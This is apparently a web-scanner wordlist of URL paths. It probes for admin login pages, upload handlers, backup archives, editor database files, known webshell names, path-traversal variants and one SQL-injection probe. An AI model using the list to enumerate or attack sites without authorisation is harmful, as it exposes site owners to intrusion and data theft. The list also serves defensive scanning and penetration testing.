/UploadImage3_upload.asp
/UploadImage3_upload.aspx
/UploadImage3_upload.php
/uploadphoto.asp
/uploadphoto.aspx
/uploadphoto.php
/uploadPic.asp
/uploadPic.aspx
/uploadPic.php
/UploadProductPic.asp
/UploadProductPic.aspx
/UploadProductPic.php
/uploads
/uploads/
/UploadSoft/
/UploadSoft/diy.asp
/UploadSoft/diy.aspx
/UploadSoft/diy.php
/uploadz
/uploadz/
/upme1.asp
/upme1.aspx
/upme1.htm
/upme1.php
/upme2.asp
/upme2.aspx
/upme2.htm
/upme2.php
/upNewsIMg.asp
/upNewsIMg.aspx
/upNewsIMg.php
/upproduce.asp
/upproduce.aspx
/upproduce.php
/upsave.asp
/upsave.aspx
/upsave.php
/ur-admin
/ur-admin.asp
/ur-admin.aspx
/ur-admin.html
/ur-admin.php
/us
/us/
/usage.asp
/usage.aspx
/usage.php
/usage/
/user
/user.asp
/user.aspx
/user.php
/user/
/user/admin.asp
/user/admin.aspx
/user/admin.php
/user/index.asp
/user/index.aspx
/user/index.php
/user/login.asp
/user/login.aspx
/user/login.php
/user/logout.asp
/user/logout.aspx
/user/logout.php
/user/super.asp
/user/super.aspx
/user/super.php
/User_Admin
/user_admin.asp
/user_admin.aspx
/user_admin.php
/User_Admin/
/user_Default.asp?
/user_Default.aspx?
/user_Default.php?
/user_files.asp
/user_files.aspx
/user_files.php
/user_friends.asp
/user_friends.aspx
/user_friends.php
/User_GetPassword.asp
/User_GetPassword.aspx
/User_GetPassword.php
/user_help.asp
/user_help.aspx
/user_help.php
/user_index.asp
/user_index.aspx
/user_index.php
/User_Login
/user_login.asp
/user_login.aspx
/user_login.php
/User_Login/
/user_message.asp
/user_message.aspx
/user_message.php
/user_messages.asp
/user_messages.aspx
/user_messages.php
/user_setting.asp
/user_setting.aspx
/user_setting.php
/user_subject.asp
/user_subject.aspx
/user_subject.php
/user_top.asp
/user_top.aspx
/user_top.php
/user_update.asp
/user_update.aspx
/user_update.php
/user_upfile.asp
/user_upfile.aspx
/user_upfile.php
/useradmin
/userDefault.asp?
/userDefault.aspx?
/userDefault.php?
/usergroup_0.asp
/usergroup_0.aspx
/usergroup_0.php
/UserList.asp
/UserList.aspx
/UserList.php
/UserLogin
/UserLogin.asp
/UserLogin.aspx
/UserLogin.php
/userlook.asp
/userlook.aspx
/userlook.php
/usermanage/
/USERok.asp
/USERok.aspx
/USERok.php
/userreg_setp2.asp
/userreg_setp2.aspx
/userreg_setp2.php
/users
/users.asp
/users.aspx
/users.php
/users/
/userslist.asp
/userslist.aspx
/userslist.php
/usr
/usr/
/usrs
/usrs/
/utility_login
/v
/v/
/vadmind
/valid
/valid/
/validate
/validate/
/validated
/validated/
/ver.asp
/ver.aspx
/ver.php
/vip_manage/login.asp
/vip_manage/login.aspx
/vip_manage/login.php
/vipuser.asp
/vipuser.aspx
/vipuser.php
/vipuser_login.asp
/vipuser_login.aspx
/vipuser_login.php
/virgin/
/vmailadmin
/vo_login.asp
/vo_login.aspx
/vo_login.php
/vote.asp
/vote.aspx
/vote.php
/w
/w/
/wantpws.asp
/wantpws.aspx
/wantpws.php
/wap/
/warez
/warez/
/warning.asp
/warning.aspx
/warning.php
/web
/web.config
/web.rar
/web.zip
/Web/
/web_admin/
/Web_Editor/
/web_login.asp
/web_login.aspx
/web_login.php
/Web_Master
/Web_Master/
/web_upfile.asp
/web_upfile.aspx
/web_upfile.php
/Web1
/Web1/
/Web2
/Web2/
/webadmin
/webadmin.asp
/webadmin.aspx
/webadmin.html
/webadmin.php
/WebAdmin/
/WebApps
/WebApps/
/webconfig.asp
/webconfig.aspx
/webconfig.php
/webDefault.asp?
/webDefault.aspx?
/webDefault.php?
/webedit/admin_login.asp
/webedit/admin_login.aspx
/webedit/admin_login.php
/WebEdit/db/ewebeditor.mdb
/webedit1/admin_login.asp
/webedit1/admin_login.aspx
/webedit1/admin_login.php
/webedit1/db/ewebeditor.mdb
/webeditor/
/WebEditor/admin_login.asp
/WebEditor/admin_login.aspx
/WebEditor/admin_login.php
/WebEditor/db/ewebeditor.mdb
/webhome
/webhome/
/weblog.asp
/weblog.aspx
/weblog.php
/weblog/
/weblogs.asp
/weblogs.aspx
/weblogs.php
/weblogs/
/webmaster
/webmaster.asp
/webmaster.aspx
/webmaster.php
/webmaster/
/webmis/
/webpet/
/webshell.asp
/webshell.aspx
/webshell.php
/webstats.asp
/webstats.aspx
/webstats.php
/webstats/
/websvn
/WeiHu
/WeiHu/
/weihu/login.asp
/weihu/login.aspx
/weihu/login.php
/wen_login.asp
/wen_login.aspx
/wen_login.php
/wenzhang
/wenzhang.asp
/wenzhang.aspx
/wenzhang.php
/wenzhang/
/whj/
/wish.asp
/wish.aspx
/wish.php
/wish/
/wizmysqladmin
/wjleft.asp
/wjleft.aspx
/wjleft.php
/woaini.asp
/woaini.aspx
/woaini.php
/wocaonima.asp
/wocaonima.aspx
/wocaonima.php
/wocaonima/
/work
/work.asp
/work.aspx
/work.php
/work/
/working
/working/
/wp-admin
/wp-admin/
/wp-login
/write.asp
/write.aspx
/write.php
/wrtxcnqywz4.asp
/wrtxcnqywz4.aspx
/wrtxcnqywz4.php
/ws.asp
/ws.aspx
/ws.php
/WsManage
/WsManage/
/wstats
/wstats.asp
/wstats.aspx
/wstats.php
/wstats/
/www
/www.asp
/www.aspx
/www.php
/www.rar
/www.zip
/www/
/www_admin/
/wwwlog.asp
/wwwlog.aspx
/wwwlog.php
/wwwlog/
/wwwroot.rar
/wwwroot.zip
/wygkcnqyhtml.asp
/wygkcnqyhtml.aspx
/wygkcnqyhtml.php
/wzgg.asp
/wzgg.aspx
/wzgg.php
/x
/x.asp
/x.aspx
/x.php
/x/
/xh_login.asp
/xh_login.aspx
/xh_login.php
/xiao.asp
/xiao.aspx
/xiao.php
/xiaolu.asp
/xiaolu.aspx
/xiaolu.php
/xiaoma.asa
/xiaoma.asp
/xiaoma.aspx
/xiaoma.php
/xlogin
/xm.asa
/xm.asp
/xm.aspx
/xm.php
/xml/
/xs_admin/
/XtAdmin
/XtAdmin/
/xwzx.asp
/xwzx.aspx
/xwzx.php
/xwzx/
/xx.asp
/xx.aspx
/xx.php
/xxms/
/xxmslogin.asp
/xxmslogin.aspx
/xxmslogin.php
/xxx.asp
/xxx.aspx
/xxx.php
/xzdata/
/xzsysadmin/
/y
/y/
/ybkc/
/ybxygy/
/ydxzdate.asa
/yes.asp
/yes.aspx
/yes.php
/yes/
/Ylxd/
/yns_login.asp
/yns_login.aspx
/yns_login.php
/yns_login/
/yonetici.asp
/yonetici.aspx
/yonetici.html
/yonetici.php
/yonetim.asp
/yonetim.aspx
/yonetim.html
/yonetim.php
/ytadmin/
/yx_Update.asp
/yx_Update.aspx
/yx_Update.php
/z
/z.asp
/z.aspx
/z.php
/z/
/Z-Blog/
/Zcfg/
/zhuye/
/zip
/zip/
/zips
/zips/
/zjpic/
/zkcf/
/zkcf/login.asp
/zkcf/login.aspx
/zkcf/login.php
/zkcf45/
/zllm.asp
/zllm.aspx
/zllm.php
/zm_marry.asp
/zm_marry.aspx
/zm_marry.php
/zs_save_add.asp
/zs_save_add.aspx
/zs_save_add.php
/zxly.asp
/zxly.aspx
/zxly.php
/zyadmin/
/zz.asp
/zz.aspx
/zz.php
/Zzm.asp 
/Zzm.aspx 
/Zzm.php 
/zzz.asp
/zzz.aspx
/zzz.php
/安全手册.txt
/安装.txt
/安装手册.txt
/安装说明.txt
/登陆.asp
/登陆.aspx
/登陆.php
/更新历史.txt
/管理员.asp
/管理员.aspx
/管理员.php
/假地址
/假地址.asp
/假地址.aspx
/假地址.php
/商业注册.txt
/升级说明.txt
/使用手册.txt
/使用说明.txt
/说明.htm
/说明.txt
/说明文档.txt
/說明.txt
/特别感谢.txt
/新建 文本文档.txt
/用户手册.txt
/用户说明.txt
/index.asp
/index.html
/get.htm
/changepwd.asp
/admin_index.asp
/down.htm
/star.asp
/book.asp
/moban.asp
/default.asp
/admin.htm
/2006.asp
/add.asp
/admin.asp
/aspadmin.asp
/adm/
/admin.html
/admin_admin.asp
/Link/upload/upload.asp
/upload/upload.asp
/fileup.asp
/LookupPass.asp
/shipin.asp
/mylink.asp
/index0.asp
/Admin_Login588.asp
/dbconn_logo.asp
/Admin_Login888.asp
/Admin_Login8.asp
/Upfilem.asp
/Upfilep.asp
/upfilexinxi.asp
/wjleft.asp
/ppbd.asp
/admintghdhgfb.asp
/Uploaddd.asp
/cxhd.asp
/baoming.asp
/admincxfb.asp
/Char.asp
/ggfb.asp
/yx_Update.asp
/Admin_Field.asp
/qyjxy.asp
/Admin_Database.asp
/gsjj.asp
/wzgg.asp
/tjly.asp
/guadmin/login.asp
/!admin!/
/%23sql.asp
/%23sql.aspx
/%23sql.php
/../admin
/houtai
/../admin.asp
/../admin.aspx
/../admin.php
/../admin/default
/../admin/default.asp
/../admin/default.aspx
/../admin/default.php
/../admin/index
/../admin/index.asp
/../admin/index.aspx
/../admin/index.php
/../admin/login
/../admin/login.asp
/../admin/login.aspx
/../admin/login.php
/../admin/manage
/../admin/manage.asp
/../admin/manage.aspx
/../admin/manage.php
//admin/login.asp
//admin/login.aspx
//admin/login.php
//szwyadmin/login.asp
//szwyadmin/login.aspx
//szwyadmin/login.php
/_Admin
/_admin.asp
/_admin.aspx
/_admin.php
/_Admin/
/_database/
/1.asa
/1.asp
/1.aspx
/1.php
/1.rar
/1.txt
/11.asa
/11.asp
/11.aspx
/11.php
/11.rar
/11/
/111.asa
/111.asp
/111.aspx
/111.php
/111.rar
/111/
/11111/
/11111/index.asp
/11111/index.aspx
/11111/index.php
/115cn.asp
/115cn.aspx
/115cn.php
/123.asa
/123.asp
/123.aspx
/123.php
/123.rar
/123.txt
/123/
/1234.asa
/1234.asp
/1234.aspx
/1234.php
/1234.rar
/12345.asa
/12345.asp
/12345.aspx
/12345.php
/12345.rar
/123456.asa
/123456.asp
/123456.aspx
/123456.php
/123456.rar
/12912.asp
/12912.aspx
/12912.php
/1ndex.asp
/1ndex.aspx
/1ndex.php
/2.txt
/2/
/2001/
/2002/
/2003/
/2004/
/2005/
/2005kycj/
/2006.asp
/2006.aspx
/2006.php
/2006/
/2007/
/2008/
/2088shop
/22.asa
/22.asp
/22.aspx
/22.php
/22.rar
/22/
/222.asa
/222.asp
/222.aspx
/222.php
/222.rar
/222/
/2fly_gift.php
/3.asa
/3.asp
/3.aspx
/3.php
/3.rar
/3.txt
/33.asa
/33.asp
/33.aspx
/33.php
/33.rar
/333.asa
/333.asp
/333.aspx
/333.php
/333.rar
/3800cc.asp
/3800cc.aspx
/3800cc.php
/4/
/5/
/6/
/6k.asp
/6k.aspx
/6k.php
/7/
/8/
/88888/
/88888/index.asp
/88888/index.aspx
/88888/index.php
/9/
/a
/a.asa
/a.asp
/a.aspx
/a.php
/a_admin.asp
/a_admin.aspx
/a_admin.aspxx
/a_admin.jsp
/a_admin.php
/a_admin.phpx
/A_Login.asp
/A_Login.aspx
/A_Login.php
/a_main.asp
/a_main.aspx
/a_main.php
/aa.asa
/aa.asp
/aa.aspx
/aa.php
/aaa.asa
/aaa.asp
/aaa.aspx
/aaa.php
/aadmin/
/abc
/abc/
/abcupload
/abcupload/
/about
/about/
/acblog.asa
/AccessDB/
/account
/account.asp
/account.aspx
/account.html
/account.php
/account/
/accounts
/accounts/
/acct/
/acct/login.asp
/acct/login.aspx
/acct/login.php
/acct_login
/ad
/ad.asp
/ad.aspx
/ad.php
/ad/
/Ad_Admin
/Ad_Admin/
/ad_admin/admin_login.asp
/ad_admin/admin_login.aspx
/ad_admin/admin_login.php
/ad_admin_login.asp
/ad_admin_login.aspx
/ad_admin_login.php
/ad_login
/ad_login.asp
/ad_login.aspx
/ad_login.php
/ad_login/
/ad_manage
/ad_manage.asp
/ad_manage.aspx
/ad_manage.php
/ad_manage/
/adadmin/
/Add
/add.asp
/add.aspx
/add.php
/Add/
/add_admin
/add_admin.asp
/add_admin.aspx
/add_admin.php
/add_admin/
/add_user.asp
/add_user.aspx
/add_user.php
/addFile.asp
/addFile.aspx
/addFile.php
/addlb.asp
/addlb.aspx
/addlb.php
/addmember.asp
/addmember.aspx
/addmember.php
/addmember/
/addmin/
/addPicture.asp
/addPicture.aspx
/addPicture.php
/adduser.asp
/adduser.aspx
/adduser.php
/adduser/
/adlogin
/adlogin.asp
/adlogin.aspx
/adlogin.php
/adlogin/
/adm
/adm.asp
/adm.aspx
/adm.php
/Adm/
/adm@in
/adm@in/
/Adm_Login
/adm_login.asp
/adm_login.aspx
/adm_login.php
/adm_login/
/adm_menu.asp
/adm_menu.aspx
/adm_menu.php
/admanage
/admanage/
/admcheck.asp
/admcheck.aspx
/admcheck.php
/admcheckform.asp
/admcheckform.aspx
/admcheckform.php
/admin
/admin.asp
/admin.aspx
/admin.aspxx
/admin.htm
/admin.html
/admin.jsp
/admin.php
/admin.phpx
/admin/
/admin/account.asp
/admin/account.aspx
/admin/account.html
/admin/account.php
/admin/adm_menu.asp
/admin/adm_menu.aspx
/admin/adm_menu.php
/admin/admin.asp
/admin/admin.aspx
/admin/admin.aspxx
/admin/admin.jsp
/admin/admin.php
/admin/admin.phpx
/admin/admin_6list.asp
/admin/admin_6list.aspx
/admin/admin_6list.php
/Admin/Admin_Index.asp
/Admin/Admin_Index.aspx
/Admin/Admin_Index.php
/admin/admin_login.asp
/admin/admin_login.aspx
/admin/admin_login.php
/admin/admin_upfile.asp
/admin/admin_upfile.aspx
/admin/admin_upfile.php
/admin/adminlogin.asp
/admin/adminlogin.aspx
/admin/adminlogin.php
/admin/aspcheck.asp
/admin/aspcheck.aspx
/admin/aspcheck.php
/admin/controlpanel.asp
/admin/controlpanel.aspx
/admin/controlpanel.html
/admin/controlpanel.php
/admin/cp.asp
/admin/cp.aspx
/admin/cp.html
/admin/cp.php
/admin/default
/admin/default.asp
/admin/Default.asp?
/admin/default.aspx
/admin/Default.aspx?
/admin/default.php
/admin/Default.php?
/admin/default/admin.asp
/admin/default/admin.aspx
/admin/default/admin.php
/admin/default/login.asp
/admin/default/login.aspx
/admin/default/login.php
/admin/edit/admin_login.asp
/admin/edit/admin_login.aspx
/admin/edit/admin_login.php
/admin/edit/db/ewebeditor.mdb
/admin/editor/admin_login.asp
/admin/editor/admin_login.asp?
/admin/editor/admin_login.aspx
/admin/editor/admin_login.aspx?
/admin/editor/admin_login.php
/admin/editor/admin_login.php?
/admin/editor/db/ewebeditor.mdb
/admin/editor/editor/filemanager/upload/test.html
/admin/eWebEditor/admin_login.asp
/admin/eWebEditor/admin_login.aspx
/admin/eWebEditor/admin_login.php
/admin/ewebeditor/db/ewebeditor.mdb
/admin/eWebEditor_v280_Free/admin_login.asp
/admin/eWebEditor_v280_Free/admin_login.aspx
/admin/eWebEditor_v280_Free/admin_login.php
/admin/eWebEditor_v280_Free/db/ewebeditor.mdb
/admin/eWebEditordb/ewebeditor.mdb
/admin/FCKeditor/ 
/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.aspx
/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.php
/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.aspx
/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.php
/admin/FCKeditor/editor/filemanager/upload/test.html
/admin/go.asp
/admin/go.aspx
/admin/go.php
/admin/home.asp
/admin/home.aspx
/admin/home.php
/admin/htmedit/admin_login.asp
/admin/htmedit/admin_login.aspx
/admin/htmedit/admin_login.php
/admin/htmedit/db/ewebeditor.mdb
/admin/index
/admin/index.asp
/admin/index.aspx
/admin/index.html
/admin/index.php
/admin/left.asp
/admin/left.aspx
/admin/left.php
/admin/login
/admin/login.asp
/admin/login.aspx
/admin/login.html
/admin/login.php
/admin/lygofa.asp
/admin/lygofa.aspx
/admin/lygofa.php
/admin/manage
/admin/manage.asp
/admin/manage.aspx
/admin/manage.php
/admin/manage/admin.asp
/admin/manage/admin.aspx
/admin/manage/admin.php
/admin/manage/login.asp
/admin/manage/login.aspx
/admin/manage/login.php
/admin/menu.asp
/admin/menu.aspx
/admin/menu.php
/admin/news.asp
/admin/news.aspx
/admin/news.php
/admin/ows_login.asp
/admin/ows_login.aspx
/admin/ows_login.php
/admin/Select_feedback.asp
/admin/Select_feedback.aspx
/admin/Select_feedback.php
/admin/test.asp/info.asp
/admin/test.aspx/info.aspx
/admin/test.php/info.php
/admin/upfile.asp
/admin/upfile.aspx
/admin/upfile.php
/admin/upload.asp
/admin/upload.aspx
/admin/upload.php
/admin/uploadfaceok.asp
/admin/uploadfaceok.aspx
/admin/uploadfaceok.php
/admin/user_login.asp
/admin/user_login.aspx
/admin/user_login.php
/admin/web_login.asp
/admin/web_login.aspx
/admin/web_login.php
/admin/WebEditor/admin_login.asp
/admin/WebEditor/admin_login.aspx
/admin/WebEditor/admin_login.php
/admin/WebEditor/db/ewebeditor.mdb
/admin/xh_login.asp
/admin/xh_login.aspx
/admin/xh_login.php
/admin/yns_login.asp
/admin/yns_login.aspx
/admin/yns_login.php
/admin_.asp
/admin_.aspx
/admin_.php
/admin_6list.asp
/admin_6list.aspx
/admin_6list.php
/admin_999/
/admin_admin
/admin_admin.asp
/admin_admin.aspx
/admin_admin.jsp
/admin_admin.php
/admin_admin/
/admin_area
/admin_backup.asp
/admin_backup.aspx
/admin_backup.php
/admin_backupdata.asp
/admin_backupdata.aspx
/admin_backupdata.php
/Admin_Bak
/admin_bak.asp
/admin_bak.aspx
/admin_bak.php
/Admin_Bak/
/Admin_BatchLink.asp
/Admin_BatchLink.aspx
/Admin_BatchLink.php
/admin_body.asa
/admin_body.asp
/admin_body.aspx
/admin_body.php
/admin_config.asp
/admin_config.asp.bak
/admin_config.aspx
/admin_config.aspx.bak
/admin_config.php
/admin_config.php.bak
/admin_count.asp
/admin_count.aspx
/admin_count.php
/admin_cp/
/Admin_Cy/
/admin_data.asp
/admin_data.asp.bak
/admin_data.asp?action=BackupData
/admin_data.asp?action=RestoreData
/admin_data.aspx
/admin_data.aspx.bak
/admin_data.aspx?action=BackupData
/admin_data.aspx?action=RestoreData
/admin_data.php
/admin_data.php.bak
/admin_data.php?action=BackupData
/admin_data.php?action=RestoreData
/Admin_DataBackup.asp
/Admin_DataBackup.aspx
/Admin_DataBackup.php
/Admin_Database.asp
/Admin_Database.aspx
/Admin_Database.php
/admin_db_backup.asp
/admin_db_backup.asp?action=BackupData
/admin_db_backup.asp?action=RestoreData
/admin_db_backup.aspx
/admin_db_backup.aspx?action=BackupData
/admin_db_backup.aspx?action=RestoreData
/admin_db_backup.php
/admin_db_backup.php?action=BackupData
/admin_db_backup.php?action=RestoreData
/admin_default.asp
/admin_Default.asp?
/admin_default.aspx
/admin_Default.aspx?
/admin_default.php
/admin_Default.php?
/admin_del.asp
/admin_del.aspx
/admin_del.php
/admin_del/
/admin_delete.asp
/admin_delete.aspx
/admin_delete.php
/admin_delete/
/admin_edit.asp
/admin_edit.aspx
/admin_edit.php
/admin_edit/
/admin_EditPass.asp
/admin_EditPass.aspx
/admin_EditPass.php
/Admin_Field.asp
/Admin_Field.aspx
/Admin_Field.php
/admin_forums.asp
/admin_forums.aspx
/admin_forums.php
/admin_guanli/
/Admin_Help_User.asp
/Admin_Help_User.aspx
/Admin_Help_User.php
/admin_home.asp
/admin_home.aspx
/admin_home.php
/admin_home/
/admin_htmlqx.asp
/admin_htmlqx.aspx
/admin_htmlqx.php
/admin_IF5KBM/
/admin_index
/admin_index.asa
/admin_index.asp
/admin_index.aspx
/admin_index.jsp
/admin_index.php
/admin_index/
/admin_index/admin_index.asp
/admin_index/admin_index.aspx
/admin_index/admin_index.php
/admin_index/login.asp
/admin_index/login.aspx
/admin_index/login.php
/admin_info.asp
/admin_info.aspx
/admin_info.php
/admin_info/
/Admin_jsCreate.asp
/Admin_jsCreate.aspx
/Admin_jsCreate.php
/admin_jy1001/
/Admin_Label.asp
/Admin_Label.aspx
/Admin_Label.php
/admin_login
/admin_login.asa
/admin_login.asp
/admin_login.aspx
/admin_login.jsp
/admin_login.php
/admin_login/
/admin_login/admin.asp
/admin_login/admin.aspx
/admin_login/admin.php
/admin_login/login.asp
/admin_login/login.aspx
/admin_login/login.php
/admin_login_lg.asp
/admin_login_lg.aspx
/admin_login_lg.php
/Admin_Login588.asp
/Admin_Login588.aspx
/Admin_Login588.php
/Admin_Login8.asp
/Admin_Login8.aspx
/Admin_Login8.php
/Admin_Login888.asp
/Admin_Login888.aspx
/Admin_Login888.php
/admin_loginadmin/
/Admin_Maillist.asp
/Admin_Maillist.aspx
/Admin_Maillist.php
/admin_main
/admin_main.asp
/admin_main.aspx
/admin_main.php
/admin_main/
/admin_manage/
/admin_manage/login.asp
/admin_manage/login.aspx
/admin_manage/login.php
/admin_manage_access/Admin_Default.asp
/admin_manage_access/Admin_Default.aspx
/admin_manage_access/Admin_Default.php
/admin_manage_access/login.asp
/admin_manage_access/login.aspx
/admin_manage_access/login.php
/admin_manager/
/admin_master.asp
/admin_master.aspx
/admin_master.php
/admin_member.asp
/admin_member.aspx
/admin_member.php
/Admin_Message.asp
/Admin_Message.aspx
/Admin_Message.php
/admin_move/
/admin_move/Admin_Login.asp
/admin_move/Admin_Login.aspx
/admin_move/Admin_Login.php
/admin_pass
/admin_pass.asp
/admin_pass.aspx
/admin_pass.php
/admin_pass/
/Admin_Photo.asp
/Admin_Photo.aspx
/Admin_Photo.php
/admin_php/
/admin_Restoredata.asp
/admin_Restoredata.aspx
/admin_Restoredata.php
/admin_server.asp
/admin_server.aspx
/admin_server.php
/admin_set.asp
/admin_set.aspx
/admin_set.php
/admin_setting.asp
/admin_setting.aspx
/admin_setting.php
/admin_setup.asp
/admin_setup.aspx
/admin_setup.php
/admin_soft.asp
/admin_soft.aspx
/admin_soft.aspxx
/admin_soft.jsp
/admin_soft.php
/admin_soft.phpx
/Admin_SoftCateMenu.Asp
/Admin_SoftCateMenu.aspx
/Admin_SoftCateMenu.php
/Admin_SoftInfo.asp
/Admin_SoftInfo.aspx
/Admin_SoftInfo.php
/Admin_SoftLink.asp
/Admin_SoftLink.aspx
/Admin_SoftLink.php
/Admin_SoftList.asp
/Admin_SoftList.aspx
/Admin_SoftList.php
/admin_sql.asp
/admin_sql.aspx
/admin_sql.php
/admin_style.asp
/admin_style.aspx
/admin_style.php
/Admin_SubCate.asp
/Admin_SubCate.aspx
/Admin_SubCate.php
/Admin_Test
/admin_test.asp
/admin_test.aspx
/admin_test.php
/Admin_Test/
/Admin_UpdateSoftNum.asp
/Admin_UpdateSoftNum.aspx
/Admin_UpdateSoftNum.php
/admin_upfile.asp
/admin_upfile.aspx
/admin_upfile.php
/admin_upload.asp
/admin_upload.aspx
/admin_upload.php
/admin_uploadF.asp
/admin_uploadF.aspx
/admin_uploadF.php
/admin_uploadfile.asp
/admin_uploadfile.aspx
/admin_uploadfile.php
/Admin_UploadFile_Style.asp
/Admin_UploadFile_Style.aspx
/Admin_UploadFile_Style.php
/admin_uploadfile_user.asp
/admin_uploadfile_user.aspx
/admin_uploadfile_user.php
/admin_user
/admin_user.asp
/admin_user.aspx
/admin_user.php
/admin_user/
/Admin_UserSetting.asp
/Admin_UserSetting.aspx
/Admin_UserSetting.php
/admin_webmaster.asp
/admin_webmaster.aspx
/admin_webmaster.php
/admin_yuzhiguo/
/admin_yuzhiguo/login.asp
/admin_yuzhiguo/login.aspx
/admin_yuzhiguo/login.php
/Admin_ZgTea_Art/
/Admin_ZgTea_Art/Login.asp
/Admin_ZgTea_Art/Login.aspx
/Admin_ZgTea_Art/Login.php
/admin1
/admin1.asp
/admin1.aspx
/admin1.html
/admin1.php
/admin1/
/admin1/Admin_Login.asp
/admin1/Admin_Login.aspx
/admin1/Admin_Login.php
/admin123
/admin123.asp
/admin123.aspx
/admin123.php
/admin123/
/Admin2
/admin2.asp
/admin2.aspx
/admin2.html
/admin2.php
/Admin2/
/Admin3
/Admin3/
/admin4_account
/admin4_colon
/admin868/
/admin888
/admin888.asp
/admin888.aspx
/admin888.php
/admin888/
/admin99/
/adminadduser.asp
/adminadduser.aspx
/adminadduser.php
/adminadduser/
/adminadmin
/adminadmin.asp
/adminadmin.aspx
/adminadmin.php
/adminadmin/
/adminceo.asp
/adminceo.aspx
/adminceo.php
/admincheck.asp
/admincheck.aspx
/admincheck.php
/admincn2008/
/admincn2008/login.asp
/admincn2008/login.aspx
/admincn2008/login.php
/adminconn.inc
/admincontrol.asp
/admincontrol.aspx
/admincontrol.html
/admincontrol.php
/admincp
/AdminCp/
/admincs.asp
/admincs.aspx
/admincs.php
/admincxfb.asp
/admincxfb.aspx
/admincxfb.php
/adminda.asp
/adminda.aspx
/adminda.php
/adminDefault.asp?
/adminDefault.aspx?
/adminDefault.php?
/admindel.asp
/admindel.aspx
/admindel.php
/admindel/
/admindelete.asp
/admindelete.aspx
/admindelete.php
/admindelete/
/adminedit
/adminedit.asp
/adminedit.aspx
/adminedit.php
/adminedit/
/AdminFile/
/AdminFile/Admin_Login.asp
/AdminFile/Admin_Login.aspx
/AdminFile/Admin_Login.php
/adminfso.asp
/adminfso.aspx
/adminfso.php
/adminin.asp
/adminin.aspx
/adminin.php
/adminindex
/adminindex.asp
/adminindex.aspx
/adminindex.php
/adminindex/
/administer
/administr8
/administr8.asp
/administr8.aspx
/administr8.html
/administr8.php
/administratie
/administration
/administration.asp
/administration.aspx
/administration.html
/administration.php
/AdministrAtion/
/administrator
/administrator.asp
/administrator.aspx
/administrator.html
/administrator.php
/administrator/
/administrator/account.asp
/administrator/account.aspx
/administrator/account.html
/administrator/account.php
/administrator/admin.asp
/administrator/admin.aspx
/administrator/admin.php
/administrator/index.asp
/administrator/index.aspx
/administrator/index.html
/administrator/index.php
/administrator/login.asp
/administrator/login.aspx
/administrator/login.html
/administrator/login.php
/administratoraccounts
/administrators
/Administrators/
/administrivia
/adminkey.asp
/adminkey.aspx
/adminkey.php
/adminlog.asp
/adminlog.aspx
/adminlog.php
/adminlogin
/adminlogin.asp
/adminlogin.aspx
/adminlogin.php
/adminlogin/
/admin-login/login.asp
/admin-login/login.aspx
/admin-login/login.php
/adminmain/
/adminmember.asp
/adminmember.aspx
/adminmember.php
/adminmember/
/adminn/
/adminpages
/adminpages/
/adminpanel.asp
/adminpanel.aspx
/adminpanel.html
/adminpanel.php
/adminpro
/adminpt/
/adminroot.asp
/adminroot.aspx
/adminroot.php
/admins
/admins.asp
/admins.aspx
/admins.html
/admins.php
/admins/
/admins_login.asp
/admins_login.aspx
/admins_login.php
/adminsys
/adminsys.asp
/adminsys.aspx
/adminsys.php
/admintab.asp
/admintab.aspx
/admintab.php
/admintab/
/admintghdhgfb.asp
/admintghdhgfb.aspx
/admintghdhgfb.php
/AdminTools
/adminuser
/adminuser.asp
/adminuser.aspx
/adminuser.php
/adminuser/
/adminuserlogin
/adminuserlogin.asp
/adminuserlogin.aspx
/adminuserlogin.php
/adminuserlogin/
/admlogin.asp
/admlogin.aspx
/admlogin.htm
/admlogin.php
/admout.asp
/admout.aspx
/admout.php
/AdmSystem
/admsystem.asp
/admsystem.aspx
/admsystem.php
/AdmSystem/
/adoconn.asp
/adoconn.aspx
/adoconn.php
/ads
/ads/
/adsense.txt
/ADSFGLKN32KFB/
/AdSystem
/AdSystem/
/adsystem/index.asp
/adsystem/index.aspx
/adsystem/index.php
/al
/al/
/amateur
/amateur/
/amateurs
/amateurs/
/amd
/amd/
/amd/index.asp
/amd/index.aspx
/amd/index.php
/amd/login.asp
/amd/login.aspx
/amd/login.php
/amd/super.asp
/amd/super.aspx
/amd/super.php
/amd_/admin.asp
/amd_/admin.aspx
/amd_/admin.php
/amd_/index.asp
/amd_/index.aspx
/amd_/index.php
/amd_/login.asp
/amd_/login.aspx
/amd_/login.php
/amd_/super.asp
/amd_/super.aspx
/amd_/super.php
/amd_007
/amd_007/
/amdin/
/ani
/ani/
/ani1
/ani1/
/anime
/anime/
/announcement.htm
/Apache/
/app
/app/
/apps
/apps/
/appz
/appz/
/arc
/arc/
/archive
/archive/
/archives
/archives/
/art.asp
/art.aspx
/art.php
/Article
/article.asp
/article.aspx
/article.php
/article/
/article/admin
/article/admin/admin.asp
/article/admin/admin.aspx
/article/admin/admin.php
/articleadmin.asp
/articleadmin.aspx
/articleadmin.php
/articleinfo.asp
/articleinfo.aspx
/articleinfo.php
/Articlelogin.asp
/Articlelogin.aspx
/Articlelogin.php
/asdf.asp
/asdf.aspx
/asdf.php
/asian
/asian/
/asians
/asians/
/asjobcom/index.asp
/asjobcom/index.aspx
/asjobcom/index.php
/asp
/asp.asp
/asp.aspx
/asp.php
/Asp/
/asp/admin/login.asp
/asp/admin/login.aspx
/asp/admin/login.php
/Asp_Admin
/Asp_Admin/
/asp99cms.asp
/asp99cms.aspx
/asp99cms.php
/aspadmin.asp
/aspadmin.aspx
/aspadmin.php
/ASPAdmin_A.asp
/ASPAdmin_A.aspx
/ASPAdmin_A.php
/asp-bin/
/aspcheck.asp
/aspcheck.aspx
/aspcheck.php
/aspcmd.asp
/aspcmd.aspx
/aspcmd.php
/asplogin.asp
/asplogin.aspx
/asplogin.php
/AspmyAdmin
/AspmyAdmin/
/aspxspy.aspx
/aspxspy.aspxx
/aspxspy.phpx
/ASPXspy2.aspx
/ASPXspy2.aspxx
/ASPXspy2.phpx
/auction.php?list=once&sql=1'
/authors.pwd
/auto
/auto.asp
/auto.aspx
/auto.php
/auto/
/autologin
/b
/b_admin.asp
/b_admin.aspx
